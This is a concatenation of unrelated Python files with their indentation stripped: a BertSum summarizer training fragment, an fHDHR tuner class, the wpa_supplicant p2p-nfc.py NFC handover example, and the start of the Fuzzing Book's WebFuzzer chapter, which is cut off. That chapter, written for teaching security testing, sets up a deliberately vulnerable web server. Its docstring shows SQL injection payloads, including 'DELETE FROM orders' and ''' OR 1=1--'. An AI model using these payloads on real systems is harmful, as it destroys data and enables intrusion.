'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
valid_loss = abs_loss(model.generator, symbols, model.vocab_size, train=False, device=device)
trainer = build_trainer(args, device_id, model, None, valid_loss)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def test_text_abs(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
model = AbsSummarizer(args, device, checkpoint)
model.eval()
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.test_batch_size, device,
shuffle=False, is_test=True)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
predictor = build_predictor(args, tokenizer, symbols, model, logger)
predictor.translate(test_iter, step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter = data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, 'cpu',
shuffle=False, is_test=True)
trainer = build_trainer(args, '-1', None, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train_abs(args, device_id):
if (args.world_size > 1):
train_abs_multi(args)
else:
train_abs_single(args, device_id)
def train_abs_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
if (args.load_from_extractive != ''):
logger.info('Loading bert from extractive model %s' % args.load_from_extractive)
bert_from_extractive = torch.load(args.load_from_extractive, map_location=lambda storage, loc: storage)
bert_from_extractive = bert_from_extractive['model']
else:
bert_from_extractive = None
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
model = AbsSummarizer(args, device, checkpoint, bert_from_extractive)
if (args.sep_optim):
optim_bert = model_builder.build_optim_bert(args, model, checkpoint)
optim_dec = model_builder.build_optim_dec(args, model, checkpoint)
optim = [optim_bert, optim_dec]
else:
optim = [model_builder.build_optim(args, model, checkpoint)]
logger.info(model)
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True, cache_dir=args.temp_dir)
symbols = {'BOS': tokenizer.vocab['[unused0]'], 'EOS': tokenizer.vocab['[unused1]'],
'PAD': tokenizer.vocab['[PAD]'], 'EOQ': tokenizer.vocab['[unused2]']}
train_loss = abs_loss(model.generator, symbols, model.vocab_size, device, train=True,
label_smoothing=args.label_smoothing)
trainer = build_trainer(args, device_id, model, optim, train_loss)
trainer.train(train_iter_fct, args.train_steps)
|
tuner.py
|
import threading
import datetime
from fHDHR.exceptions import TunerError
from fHDHR.tools import humanized_time
from .stream import Stream
class Tuner():
def __init__(self, fhdhr, inum, epg, origin):
self.fhdhr = fhdhr
self.number = inum
self.origin = origin
self.epg = epg
self.tuner_lock = threading.Lock()
self.set_off_status()
self.chanscan_url = "/api/channels?method=scan"
self.close_url = "/api/tuners?method=close&tuner=%s&origin=%s" % (self.number, self.origin)
def channel_scan(self, origin, grabbed=False):
if self.tuner_lock.locked() and not grabbed:
self.fhdhr.logger.error("%s Tuner #%s is not available." % (self.origin, self.number))
raise TunerError("804 - Tuner In Use")
if self.status["status"] == "Scanning":
self.fhdhr.logger.info("Channel Scan Already In Progress!")
else:
if not grabbed:
self.tuner_lock.acquire()
self.status["status"] = "Scanning"
self.status["origin"] = origin
self.status["time_start"] = datetime.datetime.utcnow()
self.fhdhr.logger.info("Tuner #%s Performing Channel Scan for %s origin." % (self.number, origin))
chanscan = threading.Thread(target=self.runscan, args=(origin,))
chanscan.start()
def runscan(self, origin):
self.fhdhr.api.get("%s&origin=%s" % (self.chanscan_url, origin))
self.fhdhr.logger.info("Requested Channel Scan for %s origin Complete." % origin)
self.close()
self.fhdhr.api.get(self.close_url)
def add_downloaded_size(self, bytes_count):
if "downloaded" in list(self.status.keys()):
self.status["downloaded"] += bytes_count
def grab(self, origin, channel_number):
if self.tuner_lock.locked():
self.fhdhr.logger.error("Tuner #%s is not available." % self.number)
raise TunerError("804 - Tuner In Use")
self.tuner_lock.acquire()
self.status["status"] = "Acquired"
self.status["origin"] = origin
self.status["channel"] = channel_number
self.status["time_start"] = datetime.datetime.utcnow()
self.fhdhr.logger.info("Tuner #%s Acquired." % str(self.number))
def close(self):
self.set_off_status()
if self.tuner_lock.locked():
self.tuner_lock.release()
self.fhdhr.logger.info("Tuner #%s Released." % self.number)
def get_status(self):
current_status = self.status.copy()
current_status["epg"] = {}
if current_status["status"] in ["Acquired", "Active", "Scanning"]:
current_status["running_time"] = str(
humanized_time(
int((datetime.datetime.utcnow() - current_status["time_start"]).total_seconds())))
current_status["time_start"] = str(current_status["time_start"])
if current_status["status"] in ["Active"]:
if current_status["origin"] in self.epg.epg_methods:
current_status["epg"] = self.epg.whats_on_now(current_status["channel"], method=current_status["origin"])
return current_status
def set_off_status(self):
self.status = {"status": "Inactive"}
def get_stream(self, stream_args, tuner):
stream = Stream(self.fhdhr, stream_args, tuner)
return stream.get()
def set_status(self, stream_args):
if self.status["status"] != "Active":
self.status = {
"status": "Active",
"clients": [],
"clients_id": [],
"method": stream_args["method"],
"accessed": [stream_args["accessed"]],
"origin": stream_args["origin"],
"channel": stream_args["channel"],
"proxied_url": stream_args["stream_info"]["url"],
"time_start": datetime.datetime.utcnow(),
"downloaded": 0
}
if stream_args["client"] not in self.status["clients"]:
self.status["clients"].append(stream_args["client"])
if stream_args["client_id"] not in self.status["clients_id"]:
self.status["clients_id"].append(stream_args["client_id"])
|
p2p-nfc.py
|
#!/usr/bin/python
#
# Example nfcpy to wpa_supplicant wrapper for P2P NFC operations
# Copyright (c) 2012-2013, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import os
import sys
import time
import random
import threading
import argparse
import nfc
import nfc.ndef
import nfc.llcp
import nfc.handover
import logging
import wpaspy
wpas_ctrl = '/var/run/wpa_supplicant'
ifname = None
init_on_touch = False
in_raw_mode = False
prev_tcgetattr = 0
include_wps_req = True
include_p2p_req = True
no_input = False
srv = None
continue_loop = True
terminate_now = False
summary_file = None
success_file = None
def summary(txt):
print txt
if summary_file:
with open(summary_file, 'a') as f:
f.write(txt + "\n")
def success_report(txt):
summary(txt)
if success_file:
with open(success_file, 'a') as f:
f.write(txt + "\n")
def wpas_connect():
ifaces = []
if os.path.isdir(wpas_ctrl):
try:
ifaces = [os.path.join(wpas_ctrl, i) for i in os.listdir(wpas_ctrl)]
except OSError, error:
print "Could not find wpa_supplicant: ", error
return None
if len(ifaces) < 1:
print "No wpa_supplicant control interface found"
return None
for ctrl in ifaces:
if ifname:
if ifname not in ctrl:
continue
try:
print "Trying to use control interface " + ctrl
wpas = wpaspy.Ctrl(ctrl)
return wpas
except Exception, e:
pass
return None
def wpas_tag_read(message):
wpas = wpas_connect()
if (wpas == None):
return False
cmd = "WPS_NFC_TAG_READ " + str(message).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
if "FAIL" in wpas.request(cmd):
return False
return True
def wpas_get_handover_req():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_req_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_REQ NDEF WPS-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel(tag=False):
wpas = wpas_connect()
if (wpas == None):
return None
if tag:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR-TAG").rstrip()
else:
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF P2P-CR").rstrip()
if "FAIL" in res:
return None
return res.decode("hex")
def wpas_get_handover_sel_wps():
wpas = wpas_connect()
if (wpas == None):
return None
res = wpas.request("NFC_GET_HANDOVER_SEL NDEF WPS-CR");
if "FAIL" in res:
return None
return res.rstrip().decode("hex")
def wpas_report_handover(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " P2P " + str(req).encode("hex") + " " + str(sel).encode("hex")
global force_freq
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def wpas_report_handover_wsc(req, sel, type):
wpas = wpas_connect()
if (wpas == None):
return None
cmd = "NFC_REPORT_HANDOVER " + type + " WPS " + str(req).encode("hex") + " " + str(sel).encode("hex")
if force_freq:
cmd = cmd + " freq=" + force_freq
return wpas.request(cmd)
def p2p_handover_client(llc):
message = nfc.ndef.HandoverRequestMessage(version="1.2")
message.nonce = random.randint(0, 0xffff)
global include_p2p_req
if include_p2p_req:
data = wpas_get_handover_req()
if (data == None):
summary("Could not get handover request carrier record from wpa_supplicant")
return
print "Handover request carrier record from wpa_supplicant: " + data.encode("hex")
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
global include_wps_req
if include_wps_req:
print "Handover request (pre-WPS):"
try:
print message.pretty()
except Exception, e:
print e
data = wpas_get_handover_req_wps()
if data:
print "Add WPS request in addition to P2P"
datamsg = nfc.ndef.Message(data)
message.add_carrier(datamsg[0], "active", datamsg[1:])
print "Handover request:"
try:
print message.pretty()
except Exception, e:
print e
print str(message).encode("hex")
client = nfc.handover.HandoverClient(llc)
try:
summary("Trying to initiate NFC connection handover")
client.connect()
summary("Connected for handover")
except nfc.llcp.ConnectRefused:
summary("Handover connection refused")
client.close()
return
except Exception, e:
summary("Other exception: " + str(e))
client.close()
return
summary("Sending handover request")
if not client.send(message):
summary("Failed to send handover request")
client.close()
return
summary("Receiving handover response")
message = client._recv()
if message is None:
summary("No response received")
client.close()
return
if message.type != "urn:nfc:wkt:Hs":
summary("Response was not Hs - received: " + message.type)
client.close()
return
print "Received message"
try:
print message.pretty()
except Exception, e:
print e
print str(message).encode("hex")
message = nfc.ndef.HandoverSelectMessage(message)
summary("Handover select received")
try:
print message.pretty()
except Exception, e:
print e
for carrier in message.carriers:
print "Remote carrier type: " + carrier.type
if carrier.type == "application/vnd.wfa.p2p":
print "P2P carrier type match - send to wpa_supplicant"
if "OK" in wpas_report_handover(data, carrier.record, "INIT"):
success_report("P2P handover reported successfully (initiator)")
else:
summary("P2P handover report rejected")
break
print "Remove peer"
client.close()
print "Done with handover"
global only_one
if only_one:
print "only_one -> stop loop"
global continue_loop
continue_loop = False
global no_wait
if no_wait:
print "Trying to exit.."
global terminate_now
terminate_now = True
class HandoverServer(nfc.handover.HandoverServer):
def __init__(self, llc):
super(HandoverServer, self).__init__(llc)
self.sent_carrier = None
self.ho_server_processing = False
self.success = False
# override to avoid parser error in request/response.pretty() in nfcpy
# due to new WSC handover format
def _process_request(self, request):
summary("received handover request {}".format(request.type))
response = nfc.ndef.Message("\xd1\x02\x01Hs\x12")
if not request.type == 'urn:nfc:wkt:Hr':
summary("not a handover request")
else:
try:
request = nfc.ndef.HandoverRequestMessage(request)
except nfc.ndef.DecodeError as e:
summary("error decoding 'Hr' message: {}".format(e))
else:
response = self.process_request(request)
summary("send handover response {}".format(response.type))
return response
def process_request(self, request):
self.ho_server_processing = True
clear_raw_mode()
print "HandoverServer - request received"
try:
print "Parsed handover request: " + request.pretty()
except Exception, e:
print e
sel = nfc.ndef.HandoverSelectMessage(version="1.2")
found = False
for carrier in request.carriers:
print "Remote carrier type: " + carrier.type
if carrier.type == "application/vnd.wfa.p2p":
print "P2P carrier type match - add P2P carrier record"
found = True
self.received_carrier = carrier.record
print "Carrier record:"
try:
print carrier.record.pretty()
except Exception, e:
print e
data = wpas_get_handover_sel()
if data is None:
print "Could not get handover select carrier record from wpa_supplicant"
continue
print "Handover select carrier record from wpa_supplicant:"
print data.encode("hex")
self.sent_carrier = data
if "OK" in wpas_report_handover(self.received_carrier, self.sent_carrier, "RESP"):
success_report("P2P handover reported successfully (responder)")
else:
summary("P2P handover report rejected")
break
message = nfc.ndef.Message(data);
sel.add_carrier(message[0], "active", message[1:])
break
for carrier in request.carriers:
if found:
break
print "Remote carrier type: " + carrier.type
if carrier.type == "application/vnd.wfa.wsc":
print "WSC carrier type match - add WSC carrier record"
found = True
self.received_carrier = carrier.record
print "Carrier record:"
try:
print carrier.record.pretty()
except Exception, e:
print e
data = wpas_get_handover_sel_wps()
if data is None:
print "Could not get handover select carrier record from wpa_supplicant"
continue
print "Handover select carrier record from wpa_supplicant:"
print data.encode("hex")
self.sent_carrier = data
if "OK" in wpas_report_handover_wsc(self.received_carrier, self.sent_carrier, "RESP"):
success_report("WSC handover reported successfully")
else:
summary("WSC handover report rejected")
break
message = nfc.ndef.Message(data);
sel.add_carrier(message[0], "active", message[1:])
found = True
break
print "Handover select:"
try:
print sel.pretty()
except Exception, e:
print e
print str(sel).encode("hex")
summary("Sending handover select")
self.success = True
return sel
def clear_raw_mode():
import sys, tty, termios
global prev_tcgetattr, in_raw_mode
if not in_raw_mode:
return
fd = sys.stdin.fileno()
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
def getch():
import sys, tty, termios, select
global prev_tcgetattr, in_raw_mode
fd = sys.stdin.fileno()
prev_tcgetattr = termios.tcgetattr(fd)
ch = None
try:
tty.setraw(fd)
in_raw_mode = True
[i, o, e] = select.select([fd], [], [], 0.05)
if i:
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, prev_tcgetattr)
in_raw_mode = False
return ch
def p2p_tag_read(tag):
success = False
if len(tag.ndef.message):
for record in tag.ndef.message:
print "record type " + record.type
if record.type == "application/vnd.wfa.wsc":
summary("WPS tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
if record.type == "application/vnd.wfa.p2p":
summary("P2P tag - send to wpa_supplicant")
success = wpas_tag_read(tag.ndef.message)
break
else:
summary("Empty tag")
if success:
success_report("Tag read succeeded")
return success
def rdwr_connected_p2p_write(tag):
summary("Tag found - writing - " + str(tag))
global p2p_sel_data
tag.ndef.message = str(p2p_sel_data)
success_report("Tag write succeeded")
print "Done - remove tag"
global only_one
if only_one:
global continue_loop
continue_loop = False
global p2p_sel_wait_remove
return p2p_sel_wait_remove
def wps_write_p2p_handover_sel(clf, wait_remove=True):
print "Write P2P handover select"
data = wpas_get_handover_sel(tag=True)
if (data == None):
summary("Could not get P2P handover select from wpa_supplicant")
return
global p2p_sel_wait_remove
p2p_sel_wait_remove = wait_remove
global p2p_sel_data
p2p_sel_data = nfc.ndef.HandoverSelectMessage(version="1.2")
message = nfc.ndef.Message(data);
p2p_sel_data.add_carrier(message[0], "active", message[1:])
print "Handover select:"
try:
print p2p_sel_data.pretty()
except Exception, e:
print e
print str(p2p_sel_data).encode("hex")
print "Touch an NFC tag"
clf.connect(rdwr={'on-connect': rdwr_connected_p2p_write})
def rdwr_connected(tag):
global only_one, no_wait
summary("Tag connected: " + str(tag))
if tag.ndef:
print "NDEF tag: " + tag.type
try:
print tag.ndef.message.pretty()
except Exception, e:
print e
success = p2p_tag_read(tag)
if only_one and success:
global continue_loop
continue_loop = False
else:
summary("Not an NDEF tag - remove tag")
return True
return not no_wait
def llcp_worker(llc):
global init_on_touch
if init_on_touch:
print "Starting handover client"
p2p_handover_client(llc)
return
global no_input
if no_input:
print "Wait for handover to complete"
else:
print "Wait for handover to complete - press 'i' to initiate ('w' for WPS only, 'p' for P2P only)"
global srv
global wait_connection
while not wait_connection and srv.sent_carrier is None:
if srv.ho_server_processing:
time.sleep(0.025)
elif no_input:
time.sleep(0.5)
else:
global include_wps_req, include_p2p_req
res = getch()
if res == 'i':
include_wps_req = True
include_p2p_req = True
elif res == 'p':
include_wps_req = False
include_p2p_req = True
elif res == 'w':
include_wps_req = True
include_p2p_req = False
else:
continue
clear_raw_mode()
print "Starting handover client"
p2p_handover_client(llc)
return
clear_raw_mode()
print "Exiting llcp_worker thread"
def llcp_startup(clf, llc):
print "Start LLCP server"
global srv
srv = HandoverServer(llc)
return llc
def llcp_connected(llc):
print "P2P LLCP connected"
global wait_connection
wait_connection = False
global init_on_touch
if not init_on_touch:
global srv
srv.start()
if init_on_touch or not no_input:
threading.Thread(target=llcp_worker, args=(llc,)).start()
return True
def terminate_loop():
global terminate_now
return terminate_now
def main():
clf = nfc.ContactlessFrontend()
parser = argparse.ArgumentParser(description='nfcpy to wpa_supplicant integration for P2P and WPS NFC operations')
parser.add_argument('-d', const=logging.DEBUG, default=logging.INFO,
action='store_const', dest='loglevel',
help='verbose debug output')
parser.add_argument('-q', const=logging.WARNING, action='store_const',
dest='loglevel', help='be quiet')
parser.add_argument('--only-one', '-1', action='store_true',
help='run only one operation and exit')
parser.add_argument('--init-on-touch', '-I', action='store_true',
help='initiate handover on touch')
parser.add_argument('--no-wait', action='store_true',
help='do not wait for tag to be removed before exiting')
parser.add_argument('--ifname', '-i',
help='network interface name')
parser.add_argument('--no-wps-req', '-N', action='store_true',
help='do not include WPS carrier record in request')
parser.add_argument('--no-input', '-a', action='store_true',
help='do not use stdout input to initiate handover')
parser.add_argument('--tag-read-only', '-t', action='store_true',
help='tag read only (do not allow connection handover)')
parser.add_argument('--handover-only', action='store_true',
help='connection handover only (do not allow tag read)')
parser.add_argument('--freq', '-f',
help='forced frequency of operating channel in MHz')
parser.add_argument('--summary',
help='summary file for writing status updates')
parser.add_argument('--success',
help='success file for writing success update')
parser.add_argument('command', choices=['write-p2p-sel'],
nargs='?')
args = parser.parse_args()
global only_one
only_one = args.only_one
global no_wait
no_wait = args.no_wait
global force_freq
force_freq = args.freq
logging.basicConfig(level=args.loglevel)
global init_on_touch
init_on_touch = args.init_on_touch
if args.ifname:
global ifname
ifname = args.ifname
print "Selected ifname " + ifname
if args.no_wps_req:
global include_wps_req
include_wps_req = False
if args.summary:
global summary_file
summary_file = args.summary
if args.success:
global success_file
success_file = args.success
if args.no_input:
global no_input
no_input = True
clf = nfc.ContactlessFrontend()
global wait_connection
try:
if not clf.open("usb"):
print "Could not open connection with an NFC device"
raise SystemExit
if args.command == "write-p2p-sel":
wps_write_p2p_handover_sel(clf, wait_remove=not args.no_wait)
raise SystemExit
global continue_loop
while continue_loop:
print "Waiting for a tag or peer to be touched"
wait_connection = True
try:
if args.tag_read_only:
if not clf.connect(rdwr={'on-connect': rdwr_connected}):
break
elif args.handover_only:
if not clf.connect(llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
else:
if not clf.connect(rdwr={'on-connect': rdwr_connected},
llcp={'on-startup': llcp_startup,
'on-connect': llcp_connected},
terminate=terminate_loop):
break
except Exception, e:
print "clf.connect failed"
global srv
if only_one and srv and srv.success:
raise SystemExit
except KeyboardInterrupt:
raise SystemExit
finally:
clf.close()
raise SystemExit
if __name__ == '__main__':
main()
|
WebFuzzer.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Testing Web Applications" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/WebFuzzer.html
# Last change: 2021-10-16 12:21:54+02:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Testing Web Applications
This file can be _executed_ as a script, running all experiments:
$ python WebFuzzer.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.WebFuzzer import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/WebFuzzer.html
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
>>> web_form_fuzzer = WebFormFuzzer(httpd_url)
>>> web_form_fuzzer.grammar['']
['?']
>>> web_form_fuzzer.grammar['']
['/order']
>>> web_form_fuzzer.grammar['']
['&&&&&&']
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
>>> web_form_fuzzer.fuzz()
'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
>>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
>>> sql_fuzzer.fuzz()
"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit="
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.
For more details, source, and documentation, see
"The Fuzzing Book - Testing Web Applications"
at https://www.fuzzingbook.org/html/WebFuzzer.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Testing Web Applications
# ========================
if __name__ == '__main__':
print('# Testing Web Applications')
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## A Web User Interface
## --------------------
if __name__ == '__main__':
print('\n## A Web User Interface')
from http.server import HTTPServer, BaseHTTPRequestHandler, HTTPStatus
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
pass
### Taking Orders
if __name__ == '__main__':
print('\n### Taking Orders')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
FUZZINGBOOK_SWAG = {
"tshirt": "One FuzzingBook T-Shirt",
"drill": "One FuzzingBook Rotary Hammer",
"lockset": "One FuzzingBook Lock Set"
}
HTML_ORDER_FORM = """
<html><body>
<form action="/order" style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Swag Order Form</strong>
<p>
Yes! Please send me at your earliest convenience
<select name="item">
"""
# (We don't use h2, h3, etc. here as they interfere with the notebook table of contents)
for item in FUZZINGBOOK_SWAG:
HTML_ORDER_FORM += \
'<option value="{item}">{name}</option>\n'.format(item=item,
name=FUZZINGBOOK_SWAG[item])
HTML_ORDER_FORM += """
</select>
<br>
<table>
<tr><td>
<label for="name">Name: </label><input type="text" name="name">
</td><td>
<label for="email">Email: </label><input type="email" name="email"><br>
</td></tr>
<tr><td>
<label for="city">City: </label><input type="text" name="city">
</td><td>
<label for="zip">ZIP Code: </label><input type="number" name="zip">
</tr></tr>
</table>
<input type="checkbox" name="terms"><label for="terms">I have read
the <a href="/terms">terms and conditions</a></label>.<br>
<input type="submit" name="submit" value="Place order">
</p>
</form>
</body></html>
"""
if __name__ == '__main__':
from IPython.display import display
from .bookutils import HTML
if __name__ == '__main__':
HTML(HTML_ORDER_FORM)
### Order Confirmation
if __name__ == '__main__':
print('\n### Order Confirmation')
HTML_ORDER_RECEIVED = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Thank you for your Fuzzingbook Order!</strong>
<p id="confirmation">
We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>
A confirmation mail will be sent to {email}.
</p>
<p>
Want more swag? Use our <a href="/">order form</a>!
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_ORDER_RECEIVED.format(item_name="One FuzzingBook Rotary Hammer",
name="Jane Doe",
email="doe@example.com",
city="Seattle",
zip="98104"))
### Terms and Conditions
if __name__ == '__main__':
print('\n### Terms and Conditions')
HTML_TERMS_AND_CONDITIONS = """
<html><body>
<div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;">
<strong id="title" style="font-size: x-large">Fuzzingbook Terms and Conditions</strong>
<p>
The content of this project is licensed under the
<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Creative Commons
Attribution-NonCommercial-ShareAlike 4.0 International License.</a>
</p>
<p>
To place an order, use our <a href="/">order form</a>.
</p>
</div>
</body></html>
"""
if __name__ == '__main__':
HTML(HTML_TERMS_AND_CONDITIONS)
## Storing Orders
## --------------
if __name__ == '__main__':
print('\n## Storing Orders')
import sqlite3
import os
ORDERS_DB = "orders.db"
def init_db():
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
db_connection = sqlite3.connect(ORDERS_DB)
db_connection.execute("DROP TABLE IF EXISTS orders")
db_connection.execute("CREATE TABLE orders (item text, name text, email text, city text, zip text)")
db_connection.commit()
return db_connection
if __name__ == '__main__':
db = init_db()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("INSERT INTO orders " +
"VALUES ('lockset', 'Walter White', 'white@jpwynne.edu', 'Albuquerque', '87101')")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
if __name__ == '__main__':
db.execute("DELETE FROM orders WHERE name = 'Walter White'")
db.commit()
if __name__ == '__main__':
print(db.execute("SELECT * FROM orders").fetchall())
### Handling HTTP Requests
if __name__ == '__main__':
print('\n### Handling HTTP Requests')
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
# print("GET " + self.path)
if self.path == "/":
self.send_order_form()
elif self.path.startswith("/order"):
self.handle_order()
elif self.path.startswith("/terms"):
self.send_terms_and_conditions()
else:
self.not_found()
except Exception:
self.internal_server_error()
#### Order Form
if __name__ == '__main__':
print('\n#### Order Form')
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_order_form(self):
self.send_response(HTTPStatus.OK, "Place your order")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_ORDER_FORM.encode("utf8"))
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def send_terms_and_conditions(self):
self.send_response(HTTPStatus.OK, "Terms and Conditions")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8"))
#### Processing Orders
if __name__ == '__main__':
print('\n#### Processing Orders')
import urllib.parse
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def get_field_values(self):
# Note: this fails to decode non-ASCII characters properly
query_string = urllib.parse.urlparse(self.path).query
# fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}
fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)
values = {}
for key in fields:
values[key] = fields[key][0]
return values
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
def handle_order(self):
values = self.get_field_values()
self.store_order(values)
self.send_order_received(values)
class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):
